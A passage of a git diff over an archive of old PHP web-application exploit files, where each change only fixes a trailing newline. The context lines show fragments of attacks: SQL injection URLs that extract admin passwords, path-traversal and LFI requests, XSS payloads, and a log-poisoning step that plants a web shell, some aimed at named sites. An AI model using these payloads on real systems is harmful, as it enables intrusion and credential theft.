Deshtoi (Not Found)...\n"; # - Proud 2 be Muslim ######################## -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9041.txt b/platforms/php/webapps/9041.txt index 47252e11d..d4b1b8a71 100755 --- a/platforms/php/webapps/9041.txt +++ b/platforms/php/webapps/9041.txt @@ -23,4 +23,4 @@ Demo http://audioarticledirectory.com/demo/download.php?file=./passwords.php ################################################################################################################ -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9042.pl b/platforms/php/webapps/9042.pl index 7647d53ef..86cae7af4 100755 --- a/platforms/php/webapps/9042.pl +++ b/platforms/php/webapps/9042.pl @@ -257,4 +257,4 @@ else print "Unable to retrieve the password: Is the userid correct?\n"; } -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9043.txt b/platforms/php/webapps/9043.txt index b20743673..e1e343641 100755 --- a/platforms/php/webapps/9043.txt +++ b/platforms/php/webapps/9043.txt @@ -22,4 +22,4 @@ Bu Kafiyelerde Bi Tarafına Girsin ;) Lol H....R :D < ---- Note Finished ---- > -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9044.txt b/platforms/php/webapps/9044.txt index 6efcf1f2d..68d32e20f 100755 --- a/platforms/php/webapps/9044.txt +++ b/platforms/php/webapps/9044.txt @@ -21,4 +21,4 @@ Bu Kafiyelerde Bi Tarafına Girsin ;) Lol H....R :D < ---- Note Finished ---- > -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9048.txt b/platforms/php/webapps/9048.txt index ce613dbce..43da4f1a1 100755 --- a/platforms/php/webapps/9048.txt +++ b/platforms/php/webapps/9048.txt @@ -8,4 +8,4 @@ [+] http://[sitename]/[path]//wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/wp-content/plugins/dm-albums/ ############################################################################################# -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9049.txt b/platforms/php/webapps/9049.txt index 2a353ca94..cb542fb64 100755 --- a/platforms/php/webapps/9049.txt +++ b/platforms/php/webapps/9049.txt @@ -8,4 +8,4 @@ [+] http://[sitename]/[path]/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/dm-albums/ ############################################################################################# -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9050.pl b/platforms/php/webapps/9050.pl index 6a37028e6..3bb870628 100755 --- a/platforms/php/webapps/9050.pl +++ b/platforms/php/webapps/9050.pl @@ -282,4 +282,4 @@ example: } ------------------------------------------------------------------------- -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9051.txt b/platforms/php/webapps/9051.txt index 42e4f5d5b..cbccca110 100755 --- a/platforms/php/webapps/9051.txt +++ b/platforms/php/webapps/9051.txt @@ -18,4 +18,4 @@ xpl: ******************************************* -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9052.txt b/platforms/php/webapps/9052.txt index 2c103e9fc..ba3de7673 100755 --- a/platforms/php/webapps/9052.txt +++ b/platforms/php/webapps/9052.txt @@ -21,4 +21,4 @@ example sites **************************************************************************************************************** -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9053.txt b/platforms/php/webapps/9053.txt index 998eacf0d..c5bcba3cd 100755 --- a/platforms/php/webapps/9053.txt +++ b/platforms/php/webapps/9053.txt @@ -32,4 +32,4 @@ document.cookie = "1246371700; path=/"; ################################################################################################################# -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9054.txt b/platforms/php/webapps/9054.txt index 4a8cf934c..73620288a 100755 --- a/platforms/php/webapps/9054.txt +++ b/platforms/php/webapps/9054.txt @@ -22,4 +22,4 @@ POST: guid = 0', (select concat_ws(0x3a,user_login,user_pass,user_nicename,user_ POST: click = . HTTP_REFERER = . -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9055.pl b/platforms/php/webapps/9055.pl index e6f84814a..fe0331bbe 100755 --- a/platforms/php/webapps/9055.pl +++ b/platforms/php/webapps/9055.pl @@ -107,4 +107,4 @@ sub refresh{ #WaRWolFz Crew -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9056.txt b/platforms/php/webapps/9056.txt index e75757895..d87fbb3a9 100755 --- a/platforms/php/webapps/9056.txt +++ b/platforms/php/webapps/9056.txt @@ -18,4 +18,4 @@ Example: http://www.lacinium.com/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2-- [/code] -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9057.txt b/platforms/php/webapps/9057.txt index dfe22a2dc..92189ab73 100755 --- a/platforms/php/webapps/9057.txt +++ b/platforms/php/webapps/9057.txt @@ -204,4 +204,4 @@ others's exploits: /tsepsearch.php?q=sa&s=0&e=10&user_e=10/">{XSS}<a" /tsepsearch.php?q={XSS}&s=0&e=10/&user_e=10 -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9058.pl b/platforms/php/webapps/9058.pl index 5c0228581..dc9454bac 100755 --- a/platforms/php/webapps/9058.pl +++ b/platforms/php/webapps/9058.pl @@ -107,4 +107,4 @@ sub refresh{ #WaRWolFz Crew -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9059.htm b/platforms/php/webapps/9059.htm index 0d62763e1..96c8014e0 100755 --- a/platforms/php/webapps/9059.htm +++ b/platforms/php/webapps/9059.htm @@ -19,4 +19,4 @@ </body> </html> -# milw0rm.com [2009-06-30] +# milw0rm.com [2009-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/9062.txt b/platforms/php/webapps/9062.txt index 2c95fc8ca..abdfe98d1 100755 --- a/platforms/php/webapps/9062.txt +++ b/platforms/php/webapps/9062.txt @@ -18,4 +18,4 @@ $res = $b->request(HTTP::Request->new(POST=>$host)); print "\nBrought to you by v4-team.com...\n"; print "\n[+] Message Deleted \n"; -# milw0rm.com [2009-07-01] +# milw0rm.com [2009-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/9063.txt b/platforms/php/webapps/9063.txt index e68ec0097..d13c97750 100755 --- a/platforms/php/webapps/9063.txt +++ b/platforms/php/webapps/9063.txt @@ -14,4 +14,4 @@ http://localhost/sms/admin/backup.php and you got the database download -# milw0rm.com [2009-07-01] +# milw0rm.com [2009-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/9068.txt b/platforms/php/webapps/9068.txt index 4b9c72759..ebc649c77 100755 --- a/platforms/php/webapps/9068.txt +++ b/platforms/php/webapps/9068.txt @@ -107,4 +107,4 @@ Path Disclosure /admin/head.php ------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-07-01] +# milw0rm.com [2009-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/9069.txt b/platforms/php/webapps/9069.txt index 887ab3358..fa16b2abe 100755 --- a/platforms/php/webapps/9069.txt +++ b/platforms/php/webapps/9069.txt @@ -135,4 +135,4 @@ Path Disclosure /index.php?id=../admin/passw /admin/admin_delete.php?id=thisf0ld3risn0texi5s5 -# milw0rm.com [2009-07-01] +# milw0rm.com [2009-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/907.pl b/platforms/php/webapps/907.pl index cbac79b4c..36e8d6775 100755 --- a/platforms/php/webapps/907.pl +++ b/platforms/php/webapps/907.pl @@ -69,4 +69,4 @@ if ($success==0) {print " [-] Exploit failed\n";} ## EOF ## -# milw0rm.com [2005-04-02] +# milw0rm.com [2005-04-02] \ No newline at end of file diff --git a/platforms/php/webapps/9073.php b/platforms/php/webapps/9073.php index 604a7c132..8b078fdaa 100755 --- a/platforms/php/webapps/9073.php +++ b/platforms/php/webapps/9073.php @@ -24,4 +24,4 @@ if (isset($_GET['Qabandi'])) { } ?> -# milw0rm.com [2009-07-02] +# milw0rm.com [2009-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/9075.txt b/platforms/php/webapps/9075.txt index 798c41495..1fc9b1df1 100755 --- a/platforms/php/webapps/9075.txt +++ b/platforms/php/webapps/9075.txt @@ -16,4 +16,4 @@ ######################################################################### -# milw0rm.com [2009-07-02] +# milw0rm.com [2009-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/9076.php b/platforms/php/webapps/9076.php index 6f6d4bdbb..b854365a5 100755 --- a/platforms/php/webapps/9076.php +++ b/platforms/php/webapps/9076.php @@ -198,4 +198,4 @@ for ($j = 1; $j <= 49; $j++) { } ?> -# milw0rm.com [2009-07-02] +# milw0rm.com [2009-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/9077.txt b/platforms/php/webapps/9077.txt index aa261621e..50cd5604e 100755 --- a/platforms/php/webapps/9077.txt +++ b/platforms/php/webapps/9077.txt @@ -33,4 +33,4 @@ # ######################################################################################################################## -# milw0rm.com [2009-07-02] +# milw0rm.com [2009-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/9079.txt b/platforms/php/webapps/9079.txt index 590b175fa..cb0b75aa3 100755 --- a/platforms/php/webapps/9079.txt +++ b/platforms/php/webapps/9079.txt @@ -46,4 +46,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-02] +# milw0rm.com [2009-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/9080.txt b/platforms/php/webapps/9080.txt index 84ed3a29b..ee03058f8 100755 --- a/platforms/php/webapps/9080.txt +++ b/platforms/php/webapps/9080.txt @@ -16,4 +16,4 @@ http://www.opial.com/demo/ #################################################################### Greeting : Super_Ctistal (My Master) And all Muslims&algerian Hackers -# milw0rm.com [2009-07-02] +# milw0rm.com [2009-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/9081.txt b/platforms/php/webapps/9081.txt index 161650060..4c8ceca43 100755 --- a/platforms/php/webapps/9081.txt +++ b/platforms/php/webapps/9081.txt @@ -48,4 +48,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-02] +# milw0rm.com [2009-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/9086.txt b/platforms/php/webapps/9086.txt index 88ee1e298..4cd981194 100755 --- a/platforms/php/webapps/9086.txt +++ b/platforms/php/webapps/9086.txt @@ -21,4 +21,4 @@ http://www.myhotlinks.net/cgi-bin/tgp/submit.cgi Hack it please :d ################################################################################################################ -# milw0rm.com [2009-07-09] +# milw0rm.com [2009-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/9087.php b/platforms/php/webapps/9087.php index 0b084a524..73bc13cb4 100755 --- a/platforms/php/webapps/9087.php +++ b/platforms/php/webapps/9087.php @@ -147,4 +147,4 @@ ?> -# milw0rm.com [2009-07-09] +# milw0rm.com [2009-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/9088.txt b/platforms/php/webapps/9088.txt index 177e03843..1c1b90d61 100755 --- a/platforms/php/webapps/9088.txt +++ b/platforms/php/webapps/9088.txt @@ -46,4 +46,4 @@ Author: Evil-Cod3r <- ########################################################################### -# milw0rm.com [2009-07-09] +# milw0rm.com [2009-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/9089.txt b/platforms/php/webapps/9089.txt index 2674496a6..35a19a17e 100755 --- a/platforms/php/webapps/9089.txt +++ b/platforms/php/webapps/9089.txt @@ -28,4 +28,4 @@ ---------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-07-09] +# milw0rm.com [2009-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/9091.php b/platforms/php/webapps/9091.php index eeb8b5687..1f493556a 100755 --- a/platforms/php/webapps/9091.php +++ b/platforms/php/webapps/9091.php @@ -198,4 +198,4 @@ for ($j = 1; $j <= 49; $j++) { } ?> -# milw0rm.com [2009-07-09] +# milw0rm.com [2009-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/9092.txt b/platforms/php/webapps/9092.txt index 85ce72be6..7548a8d80 100755 --- a/platforms/php/webapps/9092.txt +++ b/platforms/php/webapps/9092.txt @@ -37,4 +37,4 @@ ============================================================================================= -# milw0rm.com [2009-07-09] +# milw0rm.com [2009-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/9094.txt b/platforms/php/webapps/9094.txt index 92830a452..b9c6e07fc 100755 --- a/platforms/php/webapps/9094.txt +++ b/platforms/php/webapps/9094.txt @@ -32,4 +32,4 @@ ========================================================= -# milw0rm.com [2009-07-09] +# milw0rm.com [2009-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/9095.txt b/platforms/php/webapps/9095.txt index 29db3fb56..bfa5d10b8 100755 --- a/platforms/php/webapps/9095.txt +++ b/platforms/php/webapps/9095.txt @@ -18,4 +18,4 @@ http://localhost/test/talkback/install/help.php?language=[File] exit("Language file '$file' does not exist"); include ($file); -# milw0rm.com [2009-07-09] +# milw0rm.com [2009-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/9098.txt b/platforms/php/webapps/9098.txt index 6f4fd3116..8a47cef05 100755 --- a/platforms/php/webapps/9098.txt +++ b/platforms/php/webapps/9098.txt @@ -71,4 +71,4 @@ ======================================================================================================================================================== -# milw0rm.com [2009-07-09] +# milw0rm.com [2009-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/9099.pl b/platforms/php/webapps/9099.pl index 1c27e332b..d25a88c5b 100755 --- a/platforms/php/webapps/9099.pl +++ b/platforms/php/webapps/9099.pl @@ -36,4 +36,4 @@ else print "\n[-] Exploit Failed...\n"; } -# milw0rm.com [2009-07-09] +# milw0rm.com [2009-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/910.pl b/platforms/php/webapps/910.pl index 458e4ec20..841b88810 100755 --- a/platforms/php/webapps/910.pl +++ b/platforms/php/webapps/910.pl @@ -69,4 +69,4 @@ print " [-] Exploit failed\n"; #### EOF #### -# milw0rm.com [2005-04-04] +# milw0rm.com [2005-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/9101.txt b/platforms/php/webapps/9101.txt index 277697860..db486f0f0 100755 --- a/platforms/php/webapps/9101.txt +++ b/platforms/php/webapps/9101.txt @@ -65,4 +65,4 @@ Path Disclosure /advancedsearch.php?cmd=show& /choicelist.php -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9103.txt b/platforms/php/webapps/9103.txt index 1258d9d37..a7e93ee1e 100755 --- a/platforms/php/webapps/9103.txt +++ b/platforms/php/webapps/9103.txt @@ -40,4 +40,4 @@ LFI ---------------------------------------------------------------------------------------------------- PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 ) -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9105.txt b/platforms/php/webapps/9105.txt index 0f5f46f71..a78d9418a 100755 --- a/platforms/php/webapps/9105.txt +++ b/platforms/php/webapps/9105.txt @@ -24,4 +24,4 @@ http://www.mymsg.al4us.com/Demo/MyMsg_1.0.3/ #################################################################### Greeting : MasTer_Fin@L - ThE g0bL!N - Sarbot511 - DrEaDFuL aNd All My Friends -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9107.txt b/platforms/php/webapps/9107.txt index 70f3d8d63..fe68d74bf 100755 --- a/platforms/php/webapps/9107.txt +++ b/platforms/php/webapps/9107.txt @@ -25,4 +25,4 @@ # # ###################################### TNX GOD ###################################### -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9109.txt b/platforms/php/webapps/9109.txt index f777ca1d6..ab4b3a1c3 100755 --- a/platforms/php/webapps/9109.txt +++ b/platforms/php/webapps/9109.txt @@ -79,4 +79,4 @@ while (1) { ?> -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9110.txt b/platforms/php/webapps/9110.txt index baa852ec0..e58a818b0 100755 --- a/platforms/php/webapps/9110.txt +++ b/platforms/php/webapps/9110.txt @@ -480,4 +480,4 @@ TPRpR0Gn0WqmF8HOeDslbA8= =zEDK -----END PGP SIGNATURE----- -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9111.txt b/platforms/php/webapps/9111.txt index f3fbf5bd6..b5715dc91 100755 --- a/platforms/php/webapps/9111.txt +++ b/platforms/php/webapps/9111.txt @@ -42,4 +42,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9112.txt b/platforms/php/webapps/9112.txt index b6c0ab554..d008b4542 100755 --- a/platforms/php/webapps/9112.txt +++ b/platforms/php/webapps/9112.txt @@ -30,4 +30,4 @@ and you are unbeatable :) [!] Produced in South America --------------------------------- -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9115.txt b/platforms/php/webapps/9115.txt index 74a33d628..3dadbed60 100755 --- a/platforms/php/webapps/9115.txt +++ b/platforms/php/webapps/9115.txt @@ -18,4 +18,4 @@ Digitaldesign CMS v0.1 Database Disclosure Vulnerability [+] URL : http://[hostname]/[CMS path]/autoconfig.dd [+] Ex. : http://localhost/ddcms/autoconfig.dd -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9118.txt b/platforms/php/webapps/9118.txt index 2300207d1..4e2da96a5 100755 --- a/platforms/php/webapps/9118.txt +++ b/platforms/php/webapps/9118.txt @@ -44,4 +44,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9119.txt b/platforms/php/webapps/9119.txt index 47274f0da..15586f52e 100755 --- a/platforms/php/webapps/9119.txt +++ b/platforms/php/webapps/9119.txt @@ -16,4 +16,4 @@ Islamic ghosts Team Gr33tz:- all muslum hackerz ,all my freind -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9121.php b/platforms/php/webapps/9121.php index a4f32e196..002248c01 100755 --- a/platforms/php/webapps/9121.php +++ b/platforms/php/webapps/9121.php @@ -68,4 +68,4 @@ for ($i=0,$d=1;$i<strlen($array);) { } echo "\n"; -# milw0rm.com [2009-07-10] +# milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/9122.txt b/platforms/php/webapps/9122.txt index 8ff9214d9..d1cd00f3a 100755 --- a/platforms/php/webapps/9122.txt +++ b/platforms/php/webapps/9122.txt @@ -36,4 +36,4 @@ http://www.opial.com/demo/home.php?genres_parent=%22%3E%3Cscript%3Ealert(documen LMaster. -# milw0rm.com [2009-07-11] +# milw0rm.com [2009-07-11] \ No newline at end of file diff --git a/platforms/php/webapps/9125.txt b/platforms/php/webapps/9125.txt index ba1769d37..3efc41658 100755 --- a/platforms/php/webapps/9125.txt +++ b/platforms/php/webapps/9125.txt @@ -31,4 +31,4 @@ http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+ ---------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-07-11] +# milw0rm.com [2009-07-11] \ No newline at end of file diff --git a/platforms/php/webapps/9126.txt b/platforms/php/webapps/9126.txt index 666ad8336..489efeade 100755 --- a/platforms/php/webapps/9126.txt +++ b/platforms/php/webapps/9126.txt @@ -31,4 +31,4 @@ http://teachandsay.com/index.php?option=com_category&id=12&task=view&color=3&cat *could be different (eg: view&color=3&cat_id=) -# milw0rm.com [2009-07-11] +# milw0rm.com [2009-07-11] \ No newline at end of file diff --git a/platforms/php/webapps/9127.txt b/platforms/php/webapps/9127.txt index 2407eb3e1..fd0587ea1 100755 --- a/platforms/php/webapps/9127.txt +++ b/platforms/php/webapps/9127.txt @@ -80,4 +80,4 @@ $fields = array ("username", "password"); foreach ($fields as $field) get_field ($hostname, $path, $field); -# milw0rm.com [2009-07-11] +# milw0rm.com [2009-07-11] \ No newline at end of file diff --git a/platforms/php/webapps/9129.txt b/platforms/php/webapps/9129.txt index aa8dc31db..69327a168 100755 --- a/platforms/php/webapps/9129.txt +++ b/platforms/php/webapps/9129.txt @@ -31,4 +31,4 @@ ================================================================================================ -# milw0rm.com [2009-07-12] +# milw0rm.com [2009-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/9130.txt b/platforms/php/webapps/9130.txt index 1b193eb5a..53ecfb207 100755 --- a/platforms/php/webapps/9130.txt +++ b/platforms/php/webapps/9130.txt @@ -26,4 +26,4 @@ #In download.php set file path 2 dir ups. # ###################################### TNX GOD ###################################### -# milw0rm.com [2009-07-12] +# milw0rm.com [2009-07-12] \ No newline at end of file diff --git a/platforms/php/webapps/9132.py b/platforms/php/webapps/9132.py index d62e5ec04..23ff17a29 100755 --- a/platforms/php/webapps/9132.py +++ b/platforms/php/webapps/9132.py @@ -115,4 +115,4 @@ sub shell_up() { __END__ -# milw0rm.com [2009-07-13] +# milw0rm.com [2009-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/9138.txt b/platforms/php/webapps/9138.txt index 69def6a87..e361af601 100755 --- a/platforms/php/webapps/9138.txt +++ b/platforms/php/webapps/9138.txt @@ -23,4 +23,4 @@ Example : Demo : http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13-- -# milw0rm.com [2009-07-13] +# milw0rm.com [2009-07-13] \ No newline at end of file diff --git a/platforms/php/webapps/9144.txt b/platforms/php/webapps/9144.txt index f9c365834..019306238 100755 --- a/platforms/php/webapps/9144.txt +++ b/platforms/php/webapps/9144.txt @@ -98,4 +98,4 @@ function getthememyhtml($page) ````````````````` Salamz to All Muslim Hackers. -# milw0rm.com [2009-07-14] +# milw0rm.com [2009-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/9145.php b/platforms/php/webapps/9145.php index 40ca5a884..612c7df9e 100755 --- a/platforms/php/webapps/9145.php +++ b/platforms/php/webapps/9145.php @@ -234,4 +234,4 @@ die; ?> -# milw0rm.com [2009-07-14] +# milw0rm.com [2009-07-14] \ No newline at end of file diff --git a/platforms/php/webapps/9150.txt b/platforms/php/webapps/9150.txt index 2034005ec..b244601f6 100755 --- a/platforms/php/webapps/9150.txt +++ b/platforms/php/webapps/9150.txt @@ -34,4 +34,4 @@ SELECT * FROM wp_terms t inner join wp_term_taxonomy tt on t.term_id = tt.term_i [+] What do you see ? -# milw0rm.com [2009-07-15] +# milw0rm.com [2009-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/9151.txt b/platforms/php/webapps/9151.txt index 399c3974f..e699fcf0a 100755 --- a/platforms/php/webapps/9151.txt +++ b/platforms/php/webapps/9151.txt @@ -256,4 +256,4 @@ DISCLOSURE TIMELINE ############################################################################## ############################################################################## -# milw0rm.com [2009-07-15] +# milw0rm.com [2009-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/9153.txt b/platforms/php/webapps/9153.txt index 6b33683be..54e63cf6c 100755 --- a/platforms/php/webapps/9153.txt +++ b/platforms/php/webapps/9153.txt @@ -24,4 +24,4 @@ # Securitylab Security Research Team ################################################################### -# milw0rm.com [2009-07-15] +# milw0rm.com [2009-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/9154.js b/platforms/php/webapps/9154.js index 236482b1f..9bd819570 100755 --- a/platforms/php/webapps/9154.js +++ b/platforms/php/webapps/9154.js @@ -585,4 +585,4 @@ var MD5 = function (string) { return temp.toLowerCase(); } -// milw0rm.com [2009-07-15] +// milw0rm.com [2009-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/9155.txt b/platforms/php/webapps/9155.txt index b33b8571c..9acf92e7d 100755 --- a/platforms/php/webapps/9155.txt +++ b/platforms/php/webapps/9155.txt @@ -20,4 +20,4 @@ # # ###################################### TNX GOD ###################################### -# milw0rm.com [2009-07-15] +# milw0rm.com [2009-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/9156.py b/platforms/php/webapps/9156.py index 8c1d30e74..f6385a335 100755 --- a/platforms/php/webapps/9156.py +++ b/platforms/php/webapps/9156.py @@ -38,4 +38,4 @@ response=conn.getresponse().read() urllib.urlopen('http://' + sys.argv[1] + '/' + sys.argv[2] + '/include/processor.php?content_path=../var/access_log') print "\n\rShell created : http://" + sys.argv[1] + sys.argv[2] + "/var/sh.php\n\r" -# milw0rm.com [2009-07-15] +# milw0rm.com [2009-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/9159.php b/platforms/php/webapps/9159.php index 1df91b06a..786e90d49 100755 --- a/platforms/php/webapps/9159.php +++ b/platforms/php/webapps/9159.php @@ -92,4 +92,4 @@ die; ?> -# milw0rm.com [2009-07-15] +# milw0rm.com [2009-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/9161.txt b/platforms/php/webapps/9161.txt index 300719ce3..fb457e42c 100755 --- a/platforms/php/webapps/9161.txt +++ b/platforms/php/webapps/9161.txt @@ -24,4 +24,4 @@ Contents Change Vulnerability</font></b></p> </body> </html> -# milw0rm.com [2009-07-15] +# milw0rm.com [2009-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/9162.txt b/platforms/php/webapps/9162.txt index f0c8602bf..a7f68d9e2 100755 --- a/platforms/php/webapps/9162.txt +++ b/platforms/php/webapps/9162.txt @@ -10,4 +10,4 @@ EXPLOIT: profile.php?name='+UNION+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+webl_admin%23 -# milw0rm.com [2009-07-15] +# milw0rm.com [2009-07-15] \ No newline at end of file diff --git a/platforms/php/webapps/9164.txt b/platforms/php/webapps/9164.txt index 2a8cc133a..af8509199 100755 --- a/platforms/php/webapps/9164.txt +++ b/platforms/php/webapps/9164.txt @@ -10,4 +10,4 @@ # TiGeR-Dz # ################################### -# milw0rm.com [2009-07-16] +# milw0rm.com [2009-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/9165.pl b/platforms/php/webapps/9165.pl index 9daa1d55c..ec6a34167 100755 --- a/platforms/php/webapps/9165.pl +++ b/platforms/php/webapps/9165.pl @@ -45,4 +45,4 @@ else { __END__ -# milw0rm.com [2009-07-16] +# milw0rm.com [2009-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/9166.txt b/platforms/php/webapps/9166.txt index bdd4ab497..448ab824e 100755 --- a/platforms/php/webapps/9166.txt +++ b/platforms/php/webapps/9166.txt @@ -146,4 +146,4 @@ function redirect(){ header("Location: $site/zp-core/admin.php");exit; } ?> -# milw0rm.com [2009-07-16] +# milw0rm.com [2009-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/9171.txt b/platforms/php/webapps/9171.txt index b6e5f88b3..121bcbe2a 100755 --- a/platforms/php/webapps/9171.txt +++ b/platforms/php/webapps/9171.txt @@ -21,4 +21,4 @@ # IncluDeR # ######################################### -# milw0rm.com [2009-07-16] +# milw0rm.com [2009-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/9174.txt b/platforms/php/webapps/9174.txt index 2d4084207..95cca518b 100755 --- a/platforms/php/webapps/9174.txt +++ b/platforms/php/webapps/9174.txt @@ -71,4 +71,4 @@ | USE this vulnerability, to improve your skills for Social Engineering ;) | ============================================================================ -# milw0rm.com [2009-07-16] +# milw0rm.com [2009-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/9176.txt b/platforms/php/webapps/9176.txt index 2ddd1d100..f07e95a71 100755 --- a/platforms/php/webapps/9176.txt +++ b/platforms/php/webapps/9176.txt @@ -50,4 +50,4 @@ =========================================================================================== -# milw0rm.com [2009-07-16] +# milw0rm.com [2009-07-16] \ No newline at end of file diff --git a/platforms/php/webapps/9179.txt b/platforms/php/webapps/9179.txt index 49712aae3..ae4a442a5 100755 --- a/platforms/php/webapps/9179.txt +++ b/platforms/php/webapps/9179.txt @@ -17,4 +17,4 @@ Download : http://supersimple.org/downloads/SuperSimpleBlogScriptV2_5_4.zip http://localhost/Path/comments.php?submit=JIKO&entry=[EV!L] ----------[exploit Fin] -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9180.txt b/platforms/php/webapps/9180.txt index 6403b313e..f1712c509 100755 --- a/platforms/php/webapps/9180.txt +++ b/platforms/php/webapps/9180.txt @@ -17,4 +17,4 @@ Download : http://supersimple.org/downloads/SuperSimpleBlogScriptV2_5_4.zip http://localhost/Path/comments.php?entry=-122222 union select 0,concat(0x223E,version(),0x3A,user())-- ----------[exploit Fin] -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9182.txt b/platforms/php/webapps/9182.txt index 4b5997ffd..d6e962397 100755 --- a/platforms/php/webapps/9182.txt +++ b/platforms/php/webapps/9182.txt @@ -17,4 +17,4 @@ ########################################################################################### -# milw0rm.com [2009-07-17] +# milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/platforms/php/webapps/9183.txt b/platforms/php/webapps/9183.txt index fe438ae70..0c670b0e0 100755 